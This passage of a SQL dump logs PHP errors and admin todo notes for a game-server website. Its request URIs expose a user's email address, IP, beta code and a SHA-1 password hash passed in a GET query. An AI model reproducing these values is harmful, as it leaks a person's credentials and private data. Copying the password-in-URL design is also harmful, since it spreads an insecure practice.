`user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (864, 'ERROR', 'Character Data incomplete', '9befd81fb43ec3748b65e4eb5662d02fe050f541', 1, '/home/web/webdir/mojotrollz/mojotrollz/api/beta/Security.php', 19, '#0 /home/web/webdir/mojotrollz/mojotrollz/api/beta/api_mojotrollz_beta.php(4): Security::create(\'rylon\', \'90009b3fb5a4258...\', \'rylon@web.de\', \'enUS\', false, true, \'0c37ff1f21c1\', \'\')\n#1 [internal function]: api_mojotrollz_beta::call_account_action_create(\'rylon\', \'90009b3fb5a4258...\', \'rylon@web.de\', \'enUS\', \'0c37ff1f21c1\', \'\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#4 {main}', '37.24.148.242', 0.012, '2014-12-30 02:48:29', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=account&action=create&username=rylon&password_sha=90009b3fb5a425808fe9398bc9ff55e93ae283ab&email=rylon@web.de&locale=enUS&betacode=0c37ff1f21c1&wow_password=', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 5, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (865, 'SYSTEM\\LOG\\ERROR', 'Class not found: DBD\\ACCOUNT_CREATE', '6f45989c9cc3344b231b9d38b633844d0cfe17d7', 1, '/home/web/webdir/mojotrollz/system/system/autoload.php', 64, '#0 [internal function]: SYSTEM\\autoload::autoload(\'DBD\\\\ACCOUNT_CRE...\')\n#1 /home/web/webdir/mojotrollz/mojotrollz/api/beta/Security.php(28): spl_autoload_call(\'DBD\\\\ACCOUNT_CRE...\')\n#2 /home/web/webdir/mojotrollz/mojotrollz/api/beta/api_mojotrollz_beta.php(4): Security::create(\'rylon\', \'90009b3fb5a4258...\', \'rylon@web.de\', \'enUS\', false, true, \'0c37ff1f21c1\', \'\')\n#3 [internal function]: api_mojotrollz_beta::call_account_action_create(\'rylon\', \'90009b3fb5a4258...\', \'rylon@web.de\', \'enUS\', \'0c37ff1f21c1\', \'\')\n#4 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#5 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#6 {main}', '37.24.148.242', 0.036, '2014-12-23 14:39:11', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=account&action=create&username=rylon&password_sha=90009b3fb5a425808fe9398bc9ff55e93ae283ab&email=rylon@web.de&locale=enUS&betacode=0c37ff1f21c1&wow_password=', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 15, b'0', 0, 3, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (867, 'SYSTEM\\LOG\\ERROR', 'Could not execute prepare statement: Duplicate entry \'rylon\' for key \'idx_username\'', '0050a5efd7eb690eebc57ab994fc95ec01f0d48f', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 38, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(35): SYSTEM\\DB\\ConnectionMYS->prepare(\'DBD\\\\ACCOUNT_CRE...\', \'INSERT INTO acc...\', Array)\n#1 /home/web/webdir/mojotrollz/system/db/qq/QP.php(14): SYSTEM\\DB\\Connection->prepare(\'DBD\\\\ACCOUNT_CRE...\', \'INSERT INTO acc...\', Array)\n#2 /home/web/webdir/mojotrollz/system/db/qq/QP.php(29): SYSTEM\\DB\\QP::QQ(Array, NULL)\n#3 /home/web/webdir/mojotrollz/mojotrollz/api/beta/Security.php(28): SYSTEM\\DB\\QP::QI(Array)\n#4 /home/web/webdir/mojotrollz/mojotrollz/api/beta/api_mojotrollz_beta.php(4): Security::create(\'rylon\', \'90009b3fb5a4258...\', \'rylon@web.de\', \'enUS\', false, true, \'0c37ff1f21c1\', \'\')\n#5 [internal function]: api_mojotrollz_beta::call_account_action_create(\'rylon\', \'90009b3fb5a4258...\', \'rylon@web.de\', \'enUS\', \'0c37ff1f21c1\', \'\')\n#6 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#7 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#8 {main}', '37.24.148.242', 0.016, '2014-12-23 14:56:13', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=account&action=create&username=rylon&password_sha=90009b3fb5a425808fe9398bc9ff55e93ae283ab&email=rylon@web.de&locale=enUS&betacode=0c37ff1f21c1&wow_password=', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 18, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (866, 'ERROR', 'Username Not available!', 'd4880166793293cfc243bbcbe977e77b81dcfb45', 1, '/home/web/webdir/mojotrollz/mojotrollz/api/beta/Security.php', 12, '#0 /home/web/webdir/mojotrollz/mojotrollz/api/beta/api_mojotrollz_beta.php(4): Security::create(\'rylon\', \'90009b3fb5a4258...\', \'rylon@web.de\', \'enUS\', false, true, \'0c37ff1f21c1\', \'\')\n#1 [internal function]: api_mojotrollz_beta::call_account_action_create(\'rylon\', \'90009b3fb5a4258...\', \'rylon@web.de\', \'enUS\', \'0c37ff1f21c1\', \'\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#4 {main}', '37.24.148.242', 0.012, '2014-12-31 00:57:41', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=account&action=create&username=rylon&password_sha=90009b3fb5a425808fe9398bc9ff55e93ae283ab&email=rylon@web.de&locale=enUS&betacode=0c37ff1f21c1&wow_password=', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 0, b'0', 0, 9, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (868, 'ERROR', 'Character creation fail!', '18c440c46ba8846aed7eaf2bcc1d7a93356e1924', 1, '/home/web/webdir/mojotrollz/mojotrollz/api/beta/Security.php', 41, '#0 /home/web/webdir/mojotrollz/mojotrollz/api/beta/api_mojotrollz_beta.php(4): Security::create(\'rylon\', \'90009b3fb5a4258...\', \'rylon@web.de\', \'enUS\', false, true, \'0c37ff1f21c1\', \'\')\n#1 [internal function]: api_mojotrollz_beta::call_account_action_create(\'rylon\', \'90009b3fb5a4258...\', \'rylon@web.de\', \'enUS\', \'0c37ff1f21c1\', \'\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#4 {main}', '37.24.148.242', 0.028, '2014-12-23 14:56:59', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=account&action=create&username=rylon&password_sha=90009b3fb5a425808fe9398bc9ff55e93ae283ab&email=rylon@web.de&locale=enUS&betacode=0c37ff1f21c1&wow_password=', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 19, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (886, 'Exception', 'Scholo Spectral Tutor http://www.wowhead.com/npc=10498 resets aggro and stuff', 'cd06ffd4fef6fe96fc55fd3b77c0e57055e63ab4', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'Scholo Spectral...\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.008, '2014-12-30 04:57:31', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=Scholo%20Spectral%20Tutor%20http://www.wowhead.com/npc=10498', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 1, 1, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (885, 'Exception', 'warrior sunderarmor rank1 missing, taunt missing', '7c295899feadd6f312dd20c8eca2fb9940bc6b29', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'warrior sundera...\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.032, '2014-12-30 01:56:51', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=warrior%20sunderarmor%20rank1%20missing', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 1, 1, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (869, 'Exception', 'Kalimdor map', '6d20489cf12e64d0623296fd86cd84ff7b97a571', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'Kalimdor\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.008, '2014-12-23 15:27:04', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=Kalimdor', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 1, 1, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (870, 'Exception', 'Eastern Kingdoms map', '87a4fa2025608d192cda2c3bdc4b426bf3658398', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'Eastern Kingdom...\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.004, '2014-12-23 15:27:12', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=Eastern%20Kingdoms', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 1, 1, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (871, 'Exception', 'Db players -> db characters', '642a0bc357a5c505fd4b41215dce056a2795c330', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'Db players -> d...\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.008, '2014-12-23 17:43:22', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=Db%20players%20-%3E%20db%20characters', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 1, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (872, 'Exception', 'db characters search interface', '65758644f2d4d418470b10c8a9aa60ad085162dc', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'db characters s...\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.012, '2014-12-24 17:44:24', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=db%20characters%20search%20interface', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 1, 1, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (873, 'Exception', 'Tag statistic bug', 'b6a213907733d18c73bce52beb31ecb4f13228c0', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'Tag statistic b...\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.008, '2014-12-24 17:47:48', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=Tag%20statistic%20bug', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 1, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (874, 'SYSTEM\\LOG\\ERROR', 'Class not found: DBD\\ACCOUNT_GET', '8b6d077c3f7031a7d0e7eeb57f0b96e896c7c8ca', 1, '/home/web/webdir/mojotrollz/system/system/autoload.php', 64, '#0 [internal function]: SYSTEM\\autoload::autoload(\'DBD\\\\ACCOUNT_GET\')\n#1 /home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_account/saimod_mojotrollz_account.php(7): spl_autoload_call(\'DBD\\\\ACCOUNT_GET\')\n#2 [internal function]: saimod_mojotrollz_account::sai_mod_saimod_mojotrollz_account()\n#3 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#4 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#5 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#6 {main}', '37.24.148.242', 0.056, '2014-12-24 20:05:57', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_account', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (875, 'SYSTEM\\LOG\\ERROR', 'Could not query Database. Check ur Query Syntax or required Rights: Table \'mangos_zero_realm.accounts\' doesn\'t exist', '59b14d6ab0a5ec657af2a6aa3634a7b8f83427b8', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 49, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(43): SYSTEM\\DB\\ConnectionMYS->query(\'SELECT * FROM a...\')\n#1 /home/web/webdir/mojotrollz/system/db/qq/QQ.php(14): SYSTEM\\DB\\Connection->query(\'SELECT * FROM a...\')\n#2 /home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_account/saimod_mojotrollz_account.php(7): SYSTEM\\DB\\QQ::QQ()\n#3 [internal function]: saimod_mojotrollz_account::sai_mod_saimod_mojotrollz_account()\n#4 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#5 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#6 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#7 {main}', '37.24.148.242', 0.012, '2014-12-24 20:06:21', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_account', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (876, 'Exception', 'seppel skilltree parent rows warrior!', 'f3fc491c75bf6d4dbada65e8dd3eb91057d801c4', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'seppel skilltre...\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.008, '2014-12-24 20:29:21', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=seppel%20skilltree%20parent%20rows%20warrior!', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 1, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (877, 'SYSTEM\\LOG\\ERROR', 'Could not query Database. Check ur Query Syntax or required Rights: Table \'mangos_zero_realm.accountLEFT\' doesn\'t exist', 'd86c35b32edbd73e9b2c474057ae40b1b61d1fcc', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 49, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(43): SYSTEM\\DB\\ConnectionMYS->query(\'SELECT account....\')\n#1 /home/web/webdir/mojotrollz/system/db/qq/QQ.php(14): SYSTEM\\DB\\Connection->query(\'SELECT account....\')\n#2 /home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_db_account/saimod_mojotrollz_db_account.php(8): SYSTEM\\DB\\QQ::QQ()\n#3 [internal function]: saimod_mojotrollz_db_account::sai_mod_saimod_mojotrollz_db_account()\n#4 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#5 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#6 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#7 {main}', '37.24.148.242', 0.012, '2014-12-24 20:31:19', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_account', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (878, 'SYSTEM\\LOG\\ERROR', 'Could not query Database. Check ur Query Syntax or required Rights: Table \'host_mojotrollz.mojotrollz_account\' doesn\'t exist', '08e9f1f303d1c418472bf40451f78c0be1e071d6', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 49, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(43): SYSTEM\\DB\\ConnectionMYS->query(\'SELECT account....\')\n#1 /home/web/webdir/mojotrollz/system/db/qq/QQ.php(14): SYSTEM\\DB\\Connection->query(\'SELECT account....\')\n#2 /home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_db_account/saimod_mojotrollz_db_account.php(8): SYSTEM\\DB\\QQ::QQ()\n#3 [internal function]: saimod_mojotrollz_db_account::sai_mod_saimod_mojotrollz_db_account()\n#4 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#5 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#6 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#7 {main}', '37.24.148.242', 0.012, '2014-12-24 20:31:28', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_account', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (879, 'SYSTEM\\LOG\\ERROR', 'Could not query Database. Check ur Query Syntax or required Rights: Table 